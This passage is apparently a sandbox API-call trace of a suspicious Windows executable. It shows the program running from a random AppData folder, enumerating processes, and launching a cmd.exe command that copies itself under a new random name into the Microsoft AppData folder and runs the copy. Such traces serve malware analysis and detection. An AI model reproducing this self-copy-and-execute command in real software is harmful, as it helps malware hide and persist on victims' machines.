szExeFile="conhost.exe")) returned 1 [0094.439] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.441] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.442] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f950 | out: lppe=0x12f950*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0094.443] CloseHandle (hObject=0xcc) returned 1 [0094.443] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0094.443] GetTickCount () returned 0x22e6f [0094.443] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15123206019) returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="L\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="S\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="f\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: 
lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="R\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="H\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="u\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="r\x12ﰘ\x12\x01") returned 1 [0094.443] GetTickCount () returned 0x22e6f [0094.443] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc1c | out: lpPerformanceCount=0x12fc1c*=15123238904) returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="S\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="p\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="y\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="b\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="c\x12ﰘ\x12\x01") returned 1 [0094.443] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbf8, cbMultiByte=1, lpWideCharStr=0x12ebe0, cchWideChar=2047 | out: lpWideCharStr="k\x12ﰘ\x12\x01") returned 1 [0094.443] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0094.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc0 [0094.450] Process32FirstW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.451] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.452] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.452] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.453] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: 
lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.454] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.455] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.456] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.457] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.458] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0094.459] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.459] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: 
lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.460] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.461] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.462] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.463] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.464] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.465] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.465] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: 
lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.468] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.469] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.471] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0094.472] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0094.474] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.476] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.477] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: 
lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0094.479] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0094.480] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0094.482] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0094.483] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0094.485] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0094.486] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0094.488] 
Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0094.489] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0094.491] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0094.492] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0094.494] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0094.495] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0094.497] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 
[0094.498] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0094.500] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0094.501] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0094.502] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0094.504] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0094.505] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0094.506] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="sppsvc.exe")) returned 1 [0094.508] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.509] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.510] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.511] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.513] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.515] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0094.516] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="XEY8d7zI.exe")) returned 1 [0094.518] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.519] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.520] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0094.521] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.522] Process32NextW (in: hSnapshot=0xc0, lppe=0x12fa20 | out: lppe=0x12fa20*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0094.523] CloseHandle (hObject=0xc0) returned 1 [0094.523] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x12fee1c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0094.524] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0094.524] CharUpperBuffW (in: 
lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0094.524] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\", lpszShortPath=0x12fee1c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\") returned 0x2a [0094.524] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0094.524] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0094.524] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" [PARAMS]", cchLength=0xbd | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\MICROS~1\\LSFKRHUR.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\MICROS~1\\LSFKRHUR.EXE\" [PARAMS]") returned 0xbd [0094.524] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0094.524] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" 